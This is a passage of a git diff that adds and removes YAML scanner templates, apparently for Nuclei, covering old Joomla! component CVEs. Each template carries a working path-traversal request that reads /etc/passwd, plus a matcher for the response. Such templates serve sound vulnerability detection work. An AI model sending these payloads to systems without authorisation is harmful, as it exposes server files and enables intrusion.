4a0a004730450220022b5671694e2b5fe7f22f35d6d90d5d2c0ce4ce36385e3f95b06f8da7146dcc022100cc64174f94989d87c993f1e44ea80fed1af54b841ddfbf0e6c5bb6395343ac1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2009-1496.yaml b/poc/cve/cve-2009-1496.yaml deleted file mode 100644 index 51ca80e5ee..0000000000 --- a/poc/cve/cve-2009-1496.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-1496 - -info: - name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8367 - - https://www.cvedetails.com/cve/CVE-2009-1496 - - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/ - - http://www.securityfocus.com/bid/34431 - classification: - cve-id: CVE-2009-1496 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2009-2015-1441.yaml b/poc/cve/cve-2009-2015-1441.yaml deleted file mode 100644 index 2085a00bd4..0000000000 --- a/poc/cve/cve-2009-2015-1441.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2009-2015 -info: - name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/8898 - - https://www.cvedetails.com/cve/CVE-2009-2015 - - http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/ - - http://www.vupen.com/english/advisories/2009/1530 - classification: - cve-id: CVE-2009-2015 - tags: cve,cve2009,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2009-2100-1446.yaml b/poc/cve/cve-2009-2100-1446.yaml deleted file mode 100644 index 17c3fc5ae2..0000000000 --- a/poc/cve/cve-2009-2100-1446.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2009-2100 - -info: - name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion - author: daffainfo - severity: high - description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8946 - - https://www.cvedetails.com/cve/CVE-2009-2100 - - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/ - - https://nvd.nist.gov/vuln/detail/CVE-2009-2100 - - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cve-id: CVE-2009-2100 - cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/06 diff --git a/poc/cve/cve-2009-3053.yaml b/poc/cve/cve-2009-3053.yaml deleted file mode 100644 index 9457d3a08b..0000000000 --- a/poc/cve/cve-2009-3053.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-3053 - -info: - name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. - reference: - - https://www.exploit-db.com/exploits/9564 - - https://www.cvedetails.com/cve/CVE-2009-3053 - - https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/ - - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 - classification: - cve-id: CVE-2009-3053 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2010-0943.yaml b/poc/cve/cve-2010-0943.yaml new file mode 100644 index 0000000000..3f73c1501d --- /dev/null +++ b/poc/cve/cve-2010-0943.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-0943 + +info: + name: Joomla! Component com_jashowcase - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. + reference: + - https://www.exploit-db.com/exploits/11090 + - https://www.cvedetails.com/cve/CVE-2010-0943 + - http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/ + - http://secunia.com/advisories/33486 + classification: + cve-id: CVE-2010-0943 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/poc/cve/cve-2010-0972-1522.yaml b/poc/cve/cve-2010-0972-1522.yaml deleted file mode 100644 index 59555acafe..0000000000 --- a/poc/cve/cve-2010-0972-1522.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2010-0972 -info: - name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Apply all relevant security patches and product upgrades. - reference: - - https://www.exploit-db.com/exploits/11738 - - https://www.cvedetails.com/cve/CVE-2010-0972 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-0972 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/poc/cve/cve-2010-0982.yaml b/poc/cve/cve-2010-0982.yaml new file mode 100644 index 0000000000..62c7d669aa --- /dev/null +++ b/poc/cve/cve-2010-0982.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-0982 + +info: + name: Joomla! Component com_cartweberp - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10942 + - https://www.cvedetails.com/cve/CVE-2010-0982 + - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/ + - http://secunia.com/advisories/37917 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0982 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/poc/cve/cve-2010-1056.yaml b/poc/cve/cve-2010-1056.yaml deleted file mode 100644 index 3bb66b1b8c..0000000000 --- a/poc/cve/cve-2010-1056.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1056 - -info: - name: Joomla! Component com_rokdownloads - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11760 - - https://www.cvedetails.com/cve/CVE-2010-1056 - - http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/ - - http://secunia.com/advisories/38982 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-1056 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/poc/cve/cve-2010-1302-1567.yaml b/poc/cve/cve-2010-1302-1567.yaml deleted file mode 100644 index 5d8ce4f2be..0000000000 --- a/poc/cve/cve-2010-1302-1567.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-1302 -info: - name: Joomla! Component DW Graph - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11978 - - https://www.cvedetails.com/cve/CVE-2010-1302 - - http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/ - - http://secunia.com/advisories/39200 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1302 - tags: cve,cve2010,joomla,lfi,graph -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1305-1574.yaml b/poc/cve/cve-2010-1305-1574.yaml deleted file mode 100644 index 16b05cf68b..0000000000 --- a/poc/cve/cve-2010-1305-1574.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2010-1305 -info: - name: Joomla! Component JInventory 1.23.02 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12065 - - https://www.cvedetails.com/cve/CVE-2010-1305 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1305 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1307-1585.yaml b/poc/cve/cve-2010-1307-1585.yaml deleted file mode 100644 index 9b29490b2d..0000000000 --- a/poc/cve/cve-2010-1307-1585.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2010-1307 -info: - name: Joomla! Component Magic Updater - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12070 - - https://www.cvedetails.com/cve/CVE-2010-1307 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1307 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1308.yaml b/poc/cve/cve-2010-1308.yaml deleted file mode 100644 index f9f2d84665..0000000000 --- a/poc/cve/cve-2010-1308.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-1308 - -info: - name: Joomla! Component SVMap 1.1.1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12066 - - https://www.cvedetails.com/cve/CVE-2010-1308 - - http://www.vupen.com/english/advisories/2010/0809 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1308 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1312-1598.yaml b/poc/cve/cve-2010-1312-1598.yaml new file mode 100644 index 0000000000..e30c60b7d4 --- /dev/null +++ b/poc/cve/cve-2010-1312-1598.yaml @@ -0,0 +1,28 @@ +id: CVE-2010-1312 +info: + name: Joomla! Component News Portal 1.5.x - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12077 + - https://www.cvedetails.com/cve/CVE-2010-1312 + - http://secunia.com/advisories/39289 + - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1312 + tags: cve,cve2010,joomla,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1312.yaml b/poc/cve/cve-2010-1312.yaml new file mode 100644 index 0000000000..cc121bbc5f --- /dev/null +++ b/poc/cve/cve-2010-1312.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1312 + +info: + name: Joomla! Component News Portal 1.5.x - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12077 + - https://www.cvedetails.com/cve/CVE-2010-1312 + - http://secunia.com/advisories/39289 + - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1312 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1313-1604.yaml b/poc/cve/cve-2010-1313-1604.yaml new file mode 100644 index 0000000000..57e5496cfa --- /dev/null +++ b/poc/cve/cve-2010-1313-1604.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1313 + +info: + name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12082 + - https://www.cvedetails.com/cve/CVE-2010-1313 + - http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/ + - http://www.securityfocus.com/bid/39237 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1313 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1314.yaml b/poc/cve/cve-2010-1314.yaml deleted file mode 100644 index 8801e334b1..0000000000 --- a/poc/cve/cve-2010-1314.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1314 - -info: - name: Joomla! Component Highslide 1.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12086 - - https://www.cvedetails.com/cve/CVE-2010-1314 - - http://secunia.com/advisories/39359 - - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1314 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1315.yaml b/poc/cve/cve-2010-1315.yaml new file mode 100644 index 0000000000..d17b7846a7 --- /dev/null +++ b/poc/cve/cve-2010-1315.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1315 + +info: + name: Joomla! Component webERPcustomer - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11999 + - https://www.cvedetails.com/cve/CVE-2010-1315 + - http://secunia.com/advisories/39209 + - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1315 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1345-1621.yaml b/poc/cve/cve-2010-1345-1621.yaml new file mode 100644 index 0000000000..814e4ab08a --- /dev/null +++ b/poc/cve/cve-2010-1345-1621.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1345 + +info: + name: Joomla! Component Cookex Agency CKForms - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15453 + - https://www.cvedetails.com/cve/CVE-2010-1345 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2010-1345.yaml b/poc/cve/cve-2010-1345.yaml new file mode 100644 index 0000000000..d97a1f819f --- /dev/null +++ b/poc/cve/cve-2010-1345.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1345 + +info: + name: Joomla! Component Cookex Agency CKForms - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15453 + - https://www.cvedetails.com/cve/CVE-2010-1345 + - http://www.exploit-db.com/exploits/11785 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1345 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1352.yaml b/poc/cve/cve-2010-1352.yaml deleted file mode 100644 index 9304332380..0000000000 --- a/poc/cve/cve-2010-1352.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1352 - -info: - name: Joomla! Component Juke Box 1.7 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12084 - - https://www.cvedetails.com/cve/CVE-2010-1352 - - http://secunia.com/advisories/39357 - - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1352 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1353-1630.yaml b/poc/cve/cve-2010-1353-1630.yaml deleted file mode 100644 index 9ef89d2963..0000000000 --- a/poc/cve/cve-2010-1353-1630.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-1353 - -info: - name: Joomla! Component LoginBox - Local File Inclusion - author: daffainfo - severity: high - description: "A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php." - reference: - - https://www.exploit-db.com/exploits/12068 - - https://www.cvedetails.com/cve/CVE-2010-1353 - classification: - cve-id: CVE-2010-1353 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/30 diff --git a/poc/cve/cve-2010-1469.yaml b/poc/cve/cve-2010-1469.yaml new file mode 100644 index 0000000000..b8370e009c --- /dev/null +++ b/poc/cve/cve-2010-1469.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1469 + +info: + name: Joomla! Component JProject Manager 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12146 + - https://www.cvedetails.com/cve/CVE-2010-1469 + - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt + - http://www.exploit-db.com/exploits/12146 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1469 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1470-1653.yaml b/poc/cve/cve-2010-1470-1653.yaml new file mode 100644 index 0000000000..f5117822e8 --- /dev/null +++ b/poc/cve/cve-2010-1470-1653.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1470 + +info: + name: Joomla! Component Web TV 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12166 + - https://www.cvedetails.com/cve/CVE-2010-1470 + - http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/ + - http://www.exploit-db.com/exploits/12166 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1470 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1474.yaml b/poc/cve/cve-2010-1474.yaml deleted file mode 100644 index c7a14e2d70..0000000000 --- a/poc/cve/cve-2010-1474.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-1474 - -info: - name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12182 - - https://www.cvedetails.com/cve/CVE-2010-1474 - - http://secunia.com/advisories/39388 - classification: - cve-id: CVE-2010-1474 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/30 diff --git a/poc/cve/cve-2010-1491.yaml b/poc/cve/cve-2010-1491.yaml deleted file mode 100644 index bbda15aa41..0000000000 --- a/poc/cve/cve-2010-1491.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1491 - -info: - name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12318 - - https://www.cvedetails.com/cve/CVE-2010-1491 - - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt - - http://secunia.com/advisories/39533 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1491 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1494.yaml b/poc/cve/cve-2010-1494.yaml new file mode 100644 index 0000000000..3a962ee055 --- /dev/null +++ b/poc/cve/cve-2010-1494.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1494 + +info: + name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12113 + - https://www.cvedetails.com/cve/CVE-2010-1494 + - http://www.exploit-db.com/exploits/12113 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1494 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/poc/cve/cve-2010-1532.yaml b/poc/cve/cve-2010-1532.yaml deleted file mode 100644 index 79bd64b71f..0000000000 --- a/poc/cve/cve-2010-1532.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1532 - -info: - name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12118 - - https://www.cvedetails.com/cve/CVE-2010-1532 - - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt - - http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/ - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1532 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/poc/cve/cve-2010-1540-1729.yaml b/poc/cve/cve-2010-1540-1729.yaml deleted file mode 100644 index 7871928c1d..0000000000 --- a/poc/cve/cve-2010-1540-1729.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-1540 - -info: - name: Joomla! Component com_blog - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows 